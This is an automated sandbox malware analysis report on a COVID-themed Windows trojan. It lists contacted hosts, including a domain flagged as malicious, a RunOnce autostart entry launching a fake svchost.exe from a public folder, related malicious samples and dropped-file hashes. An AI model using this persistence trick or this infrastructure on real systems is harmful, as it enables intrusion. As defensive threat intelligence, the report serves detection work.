                                                                  https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02New variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000001B.00000003.309958248.0000022377260000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgNew variant of covid 19.exe, 00000000.00000003.202267041.000000000421A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.265515884.000000000393A000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000001B.00000003.287773862.0000022377231000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schema.org/ListItemsvchost.exe, 00000015.00000003.303084080.0000000003D9A000.00000004.00000001.sdmpfalse
                                                                        		high

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        208.95.112.1
                                                                        		ip-api.comUnited States
                                                                        		53334TUT-ASUSfalse
                                                                        104.21.31.39
                                                                        		liverpoolofcfanclub.comUnited States
                                                                        		13335CLOUDFLARENETUStrue
                                                                        103.28.70.164
                                                                        		devils.shacknet.usUnited States
                                                                        		29802HVC-ASUSfalse

                                                                        Private

                                                                        IP
                                                                        192.168.2.1
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:365752
                                                                        Start date:09.03.2021
                                                                        Start time:22:17:56
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 14m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:New variant of covid 19.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:40
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@48/29@47/5
                                                                        EGA Information:
                                                                        • Successful, ratio: 16.7%
                                                                        HDC Information:
                                                                        • Successful, ratio: 0.7% (good quality ratio 0.4%)
                                                                        • Quality average: 37.4%
                                                                        • Quality standard deviation: 38.4%
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 168.61.161.212, 93.184.221.240, 104.43.139.144, 52.255.188.83, 104.43.193.48, 23.210.248.85, 51.11.168.160, 205.185.216.42, 205.185.216.10, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194
                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6552 because it is empty
                                                                        • Execution Graph export aborted for target svchost.exe, PID 1488 because there are no executed function
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        22:18:40API Interceptor1x Sleep call for process: New variant of covid 19.exe modified
                                                                        22:18:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenX explorer.exe "C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe"
                                                                        22:19:03API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                        22:19:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce pCcbyECLkRnNLdtuxyDTqTtBdenX explorer.exe "C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe"
                                                                        22:19:09API Interceptor4x Sleep call for process: svchost.exe modified
                                                                        22:19:16API Interceptor58x Sleep call for process: powershell.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        208.95.112.1Shipment documents pdf.jarGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        O8FQdUK9P0.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/line/
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        LjtPTxmLC7.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json
                                                                        Documents.pdf.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        Korea Shipment Return Receipt 20210303_pdf.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        Cl0BXg5o8C.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/line/
                                                                        vW4DTPbAYe.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        dfbzXONkPM.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        CBF70lVX8M.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/xml
                                                                        nqljf9D3k7.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        0wTbI1V07f.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        i795zXB64c.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        z09012021780102100001078.jsGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        Quotation (RFQ).exeGet hashmaliciousBrowse
                                                                        • ip-api.com/line/?fields=hosting
                                                                        LdbSc1QMsk.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/xml
                                                                        11VLjko22U.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/json/
                                                                        bPIaXZBdd0.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/xml
                                                                        JVVgAyVhwe.exeGet hashmaliciousBrowse
                                                                        • ip-api.com/xml

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        liverpoolofcfanclub.comSecuriteInfo.com.Trojan.Win32.Save.a.5815.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        Order08032021.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        Hengsu_H213800.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        Nadisveli.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        Payment slip.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        Inquiry #00103092021.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        UAQaXpJZ6l.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        Tax Invoice_309221.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        CN-Invoice-XXXXX9808-19011143287998.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        Matiexgoods.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        DOC-03082175453465667686557.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.6326.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Program.Win32.Wacapew.Cml.2151.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Win32.Trojan.Inject.Auto.29141.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Trojan.GenericKD.36471379.15757.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.StaticAI-SuspiciousPE.13139.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Program.Win32.Wacapew.Cml.24985.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        SecuriteInfo.com.generic.ml.7366.exeGet hashmaliciousBrowse
                                                                        • 172.67.174.240
                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.16344.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.25010.exeGet hashmaliciousBrowse
                                                                        • 104.21.31.39
                                                                        ip-api.comShipment documents pdf.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        O8FQdUK9P0.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        LjtPTxmLC7.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Documents.pdf.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Korea Shipment Return Receipt 20210303_pdf.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Cl0BXg5o8C.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        vW4DTPbAYe.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        dfbzXONkPM.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        CBF70lVX8M.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        nqljf9D3k7.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        0wTbI1V07f.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        i795zXB64c.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        z09012021780102100001078.jsGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Quotation (RFQ).exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        LdbSc1QMsk.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        11VLjko22U.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        bPIaXZBdd0.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        JVVgAyVhwe.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        HVC-ASUSComplaint-Copy-684082724-03092021.xlsGet hashmaliciousBrowse
                                                                        • 23.111.148.162
                                                                        Complaint-Copy-684082724-03092021.xlsGet hashmaliciousBrowse
                                                                        • 23.111.148.162
                                                                        P.O71540.xlsxGet hashmaliciousBrowse
                                                                        • 46.21.153.231
                                                                        WinRAR_1845561462.exeGet hashmaliciousBrowse
                                                                        • 194.126.175.195
                                                                        RS12.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        OH76.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        JX75.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        RV15.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        MP57.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        UZ44.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        NC54.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        UD73.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        DB34.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        XL49.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        HN75.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        ST22.vbsGet hashmaliciousBrowse
                                                                        • 209.133.209.251
                                                                        PO342823.xlsxGet hashmaliciousBrowse
                                                                        • 46.21.153.231
                                                                        IRS-TAX.xlsmGet hashmaliciousBrowse
                                                                        • 194.126.175.2
                                                                        IRS-TAX.xlsmGet hashmaliciousBrowse
                                                                        • 194.126.175.2
                                                                        IRS-TAX.xlsmGet hashmaliciousBrowse
                                                                        • 194.126.175.2
                                                                        TUT-ASUSShipment documents pdf.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        O8FQdUK9P0.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        OVERDUE INVOICE.jarGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        LjtPTxmLC7.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Documents.pdf.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Korea Shipment Return Receipt 20210303_pdf.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Cl0BXg5o8C.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        vW4DTPbAYe.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        dfbzXONkPM.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        CBF70lVX8M.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        nqljf9D3k7.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        0wTbI1V07f.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        i795zXB64c.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        z09012021780102100001078.jsGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        Quotation (RFQ).exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        LdbSc1QMsk.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        11VLjko22U.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        I08uE3nemA.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        bPIaXZBdd0.exeGet hashmaliciousBrowse
                                                                        • 208.95.112.1
                                                                        CLOUDFLARENETUSQJm5ae3qwZ.dllGet hashmaliciousBrowse
                                                                        • 104.20.184.68
                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.27630.dllGet hashmaliciousBrowse
                                                                        • 104.20.185.68
                                                                        Complaint-Copy-676926603-03092021.xlsGet hashmaliciousBrowse
                                                                        • 172.67.202.46
                                                                        Complaint-Copy-645863057-03092021.xlsGet hashmaliciousBrowse
                                                                        • 172.67.202.46
                                                                        Complaint-Copy-676926603-03092021.xlsGet hashmaliciousBrowse
                                                                        • 104.21.14.19
                                                                        Complaint-Copy-645863057-03092021.xlsGet hashmaliciousBrowse
                                                                        • 104.21.14.19
                                                                        lptV9TKRE2.dllGet hashmaliciousBrowse
                                                                        • 104.20.185.68
                                                                        qbJSQpaAiy.dllGet hashmaliciousBrowse
                                                                        • 104.20.185.68
                                                                        CCqjThQhKf.dllGet hashmaliciousBrowse
                                                                        • 104.20.184.68
                                                                        6PRaskNs.exeGet hashmaliciousBrowse
                                                                        • 104.23.99.190
                                                                        SecuriteInfo.com.Trojan.Win32.Save.a.32500.dllGet hashmaliciousBrowse
                                                                        • 104.20.185.68
                                                                        ExistingExcel.dllGet hashmaliciousBrowse
                                                                        • 104.20.185.68
                                                                        commerce _03.09.2021.docGet hashmaliciousBrowse
                                                                        • 104.21.26.115
                                                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        Complaint-Copy-1308127799-03092021.xlsGet hashmaliciousBrowse
                                                                        • 172.67.202.46
                                                                        Complaint-Copy-1308127799-03092021.xlsGet hashmaliciousBrowse
                                                                        • 104.21.14.19
                                                                        FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                                        • 172.67.148.56
                                                                        Complaint-Copy-1308127799-03092021.xlsGet hashmaliciousBrowse
                                                                        • 104.21.14.19
                                                                        Complaint-Copy-1308127799-03092021.xlsGet hashmaliciousBrowse
                                                                        • 172.67.202.46
                                                                        PERuTR7vGb.dllGet hashmaliciousBrowse
                                                                        • 104.20.184.68

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):24576
                                                                        Entropy (8bit):0.36205444996716485
                                                                        Encrypted:false
                                                                        SSDEEP:48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
                                                                        MD5:353C0E84A6C573D30B15481706263B9A
                                                                        SHA1:4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
                                                                        SHA-256:4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
                                                                        SHA-512:210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
                                                                        Malicious:false
                                                                        Preview: .............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.24175664763109972
                                                                        Encrypted:false
                                                                        SSDEEP:12:bqrGaD0JcaaD0JwQQ/tAg/0bjSQJqvBJX8JV1tJV1:bqtgJctgJwXurjSucJX8JVbJV
                                                                        MD5:09D5ACBF323A6DE3EAB1CDC24DF0FB3E
                                                                        SHA1:CE2B3CC4BB95F467F67C48029C56513ABF52711F
                                                                        SHA-256:CA18145E467CCFD63D52C297C448BE3DE3FE21E9F9E9AEB475A77C842607560C
                                                                        SHA-512:772ACDDA83937D1543CD8C5DBF65E9FAFC0970855FE727D2BB8B7DE30AF4357DC479F74D05BC455435E2106DE7FA2B74B92847A660608EEE81EF8A8760498940
                                                                        Malicious:false
                                                                        Preview: ....E..h..(..........yO.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................yO...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9ddcdd19, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):131072
                                                                        Entropy (8bit):0.09748143624764614
                                                                        Encrypted:false
                                                                        SSDEEP:24:0l9Oil9OjPMOjPMOaLOaLOSPJ4L6PJ4L:6OIOjUOjUOAOAOSPw6Pw
                                                                        MD5:D13D2A37E75A3512CD16100B95D17F3A
                                                                        SHA1:1CC7CB2250B6A8F925F74E42118DB906F4C7F0E9
                                                                        SHA-256:B3B32BB5F6642964CB049C0FCC541AA13DBC437837271602EF7A6030113F6B0E
                                                                        SHA-512:9ED6DD53362DF95E90D25ACB9F8FEA5FA74E6A4173F01EFF4503F9677F92DBC5E3C64AFA5E05BE6967C05D30D29519236E8C21E781927085B46147CE08CD1F13
                                                                        Malicious:false
                                                                        Preview: ....... ................e.f.3...w........................&..........w.......yO.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................[p).....y.m................9n.......yO.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1148485438083448
                                                                        Encrypted:false
                                                                        SSDEEP:6:45Xsct410EOATiscy7ZlNv+83isctstlA88StTrsztleJ:4ht4NOXy7UtswUteO
                                                                        MD5:39FBED624E984B941C1584EF4C713A16
                                                                        SHA1:08D7D163A0EF14BE11040850E7B6D86D6259A8F4
                                                                        SHA-256:60D35D38000E86D891D2DBD2B38E682CE942C935531ED53411B2E775A824F60F
                                                                        SHA-512:F485136BC0B17474B2771ECB659E072807F613F0F749D82BFA4165DE20BA442693F185B35509A67DC90C3583BC38BED13705F237E018E6739455F9FF7F33ECAC
                                                                        Malicious:false
                                                                        Preview: .6lR.....................................3...w.......yO......w...............w.......w....:O.....w..................9n.......yO.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_New variant of c_e98153242e2463491fed9836c52db2aa5aff77_4c54b198_1517500f\Report.wer
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):17456
                                                                        Entropy (8bit):3.7705204746922343
                                                                        Encrypted:false
                                                                        SSDEEP:192:5R6HGmuW5OmHBUZMXCaKs9oQ7O27/u7srS274It6m:SfuWhBUZMXCaPOk/u7srX4It6m
                                                                        MD5:63B30434E203C24A496F3C4684FA6E3D
                                                                        SHA1:3323E7E7C7EEFFE0B53C572CEA7D84A664D74B3D
                                                                        SHA-256:499C54C89B90D03F075DF63E81F3F9D37E470C2182CDC545B9DD2958D4FFC85F
                                                                        SHA-512:B0A646298E61CB06802D513CD81C16B70B9C2928A8D213456D9132D4070C5480E357C768C9606FCD924F14D985E8160C345E9E9DA9F624894CEA884CE9CECC6F
                                                                        Malicious:false
                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.9.8.3.0.7.3.9.9.1.6.9.7.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.9.8.3.0.7.4.1.6.6.6.9.7.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.4.3.6.a.0.b.-.e.6.d.9.-.4.a.6.b.-.9.e.8.7.-.3.d.f.f.f.3.e.a.6.3.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.0.8.b.e.7.-.1.2.0.1.-.4.5.b.5.-.b.8.9.8.-.0.4.b.2.4.b.f.d.b.0.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w. .v.a.r.i.a.n.t. .o.f. .c.o.v.i.d. .1.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Y.N.c.e.g.b.h. .O.A.a.E.n.t.X.r.D.d.b.r.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.4.-.0.0.0.1.-.0.0.1.7.-.c.4.7.5.-.3.1.3.6.7.5.1.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.7.3.5.e.4.f.4.5.6.9.f.a.6.a.5.0.6.f.f.b.b.1.6.2.3.2.8.d.4.7.0.0.0.0.0.9.0.4.!.0.0.0.0.b.7.6.7.f.e.6.
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4292.tmp.dmp
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 15 streams, Wed Mar 10 06:19:00 2021, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):343667
                                                                        Entropy (8bit):3.631058320122662
                                                                        Encrypted:false
                                                                        SSDEEP:3072:3uoi+Qw9gIOgF5gbitSE0JsxUCgUHtnfVxT0ooe/440mnjd+p/9CzCprFb:D9RpDgeTTjNf0B40mQpVXb
                                                                        MD5:C05920B7C7138016CABEBBB1908FB7E2
                                                                        SHA1:B3E37F4F6A2FD267DA2771AA805E0356A7294F1C
                                                                        SHA-256:5D6AD1F09E8DA339D0E58C038618F09E1E24CDD5FF861AB7A96DB0236B6CCC1D
                                                                        SHA-512:006A8E8BFAFE3D690E5845E092B77053090254CDF0CBD0B9CFEC5D94716DC9BEDBAFC33356E59FC632640D506ED26172CCCDFBCB297D8FD1E21A7059FC23B0F4
                                                                        Malicious:false
